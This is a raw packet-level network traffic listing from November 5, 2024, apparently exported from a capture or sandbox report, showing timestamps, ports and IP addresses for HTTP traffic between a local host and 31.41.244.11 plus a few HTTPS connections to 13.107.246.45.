Nov 5, 2024 18:46:09.080658913 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080665112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080673933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080683947 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080684900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080698013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080723047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080734015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080743074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080751896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080760956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080770969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080776930 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080781937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080790043 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080799103 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080831051 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080861092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080872059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080882072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080904007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080914021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080918074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080924034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.080938101 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080967903 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.080991983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.081001997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.081011057 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.081041098 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.081051111 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.081505060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.081515074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.081526995 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.081549883 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.081574917 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.081589937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.081600904 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.081614017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.081624031 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.081634045 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.081651926 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.081901073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.081943989 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.082053900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.082063913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.082072973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.082091093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.082103014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.082108974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.082110882 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.082118988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.082129002 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.082132101 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.082142115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.082153082 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.082186937 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.082210064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.082221031 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.082231045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.082241058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.082250118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.082261086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.082277060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.082287073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.082289934 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.082289934 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.082289934 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.082293034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.082302094 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.082314014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.082323074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.082323074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.082345963 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.082370996 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.083513021 CET	443	49814	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.083894014 CET	49814	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.083908081 CET	443	49814	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.084342003 CET	49814	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.084347010 CET	443	49814	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.101077080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101088047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101098061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101133108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.101161003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.101162910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101172924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101183891 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101192951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101206064 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.101210117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101214886 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.101219893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101238012 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.101238012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101248026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101260900 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.101291895 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.101341963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101351023 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101360083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101370096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101383924 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.101396084 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.101418972 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.101449966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101460934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101475000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101491928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101497889 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.101502895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101514101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101522923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.101552963 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.101597071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101613045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101624012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101634026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101644039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101650000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.101655006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101663113 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.101686001 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.101742029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101752043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101763010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101789951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.101804972 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.101810932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101819992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101829052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101839066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101852894 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.101862907 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.101926088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101937056 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101946115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101954937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101963997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101968050 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.101974010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101983070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.101984978 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.102006912 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.102024078 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.102066040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102077961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102113008 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.102186918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102196932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102205992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102216959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102226973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102226973 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.102237940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102253914 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.102261066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.102298021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102308035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102341890 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.102358103 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102369070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102377892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102386951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102401972 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.102425098 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.102437019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102447033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102457047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102478027 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.102498055 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.102504015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102514982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102554083 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.102576971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102588892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102623940 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.102658033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102668047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102674961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102684021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102710962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.102721930 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.102797031 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102807999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102818012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102838039 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.102853060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102859020 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.102863073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102873087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102881908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102890015 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.102891922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102899075 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.102916956 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.102946043 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.102952003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.102997065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103008032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103043079 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.103049994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103096962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.103113890 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103125095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103135109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103142023 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103161097 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.103183985 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.103251934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103262901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103274107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103295088 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.103329897 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.103348970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103358984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103368044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103379011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103391886 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.103413105 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.103487015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103497982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103507996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103518963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103529930 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.103540897 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.103571892 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.103598118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103609085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103617907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103627920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103640079 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.103667021 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.103691101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103699923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103709936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103718042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.103735924 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.103748083 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.151379108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.151392937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.151403904 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.151487112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.158588886 CET	443	49813	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.158670902 CET	443	49813	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.158869028 CET	49813	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.158911943 CET	49813	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.158921957 CET	443	49813	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.158931971 CET	49813	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.158937931 CET	443	49813	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.161896944 CET	49818	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.161955118 CET	443	49818	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.162142038 CET	49818	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.162193060 CET	49818	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.162203074 CET	443	49818	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.201001883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.201013088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.201024055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.201085091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.201095104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.201097965 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.201101065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.201111078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.201122999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.201154947 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.201164961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.201169968 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.201174974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.201200962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.201221943 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.201230049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.201240063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.201248884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.201263905 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.201291084 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.201800108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.201813936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.201824903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.201845884 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.201862097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.201867104 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.201873064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.201894999 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.201916933 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.202069044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202116966 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.202126980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202136040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202162027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202172041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202179909 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.202198029 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.202253103 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202263117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202280998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202290058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202296972 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.202301025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202306986 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.202310085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202342033 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.202361107 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.202368975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202378988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202385902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202411890 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.202533007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202543974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202553034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202563047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202572107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202574968 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.202581882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202590942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202593088 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.202603102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202614069 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.202631950 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.202683926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202694893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202704906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202713966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202723980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202725887 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.202745914 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.202759981 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.202806950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202816963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202826023 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202835083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202843904 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202847004 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.202872038 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.202933073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202943087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202953100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202961922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202972889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.202974081 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.202981949 CET	80	49804	31.41.244.11	192.168.2.4
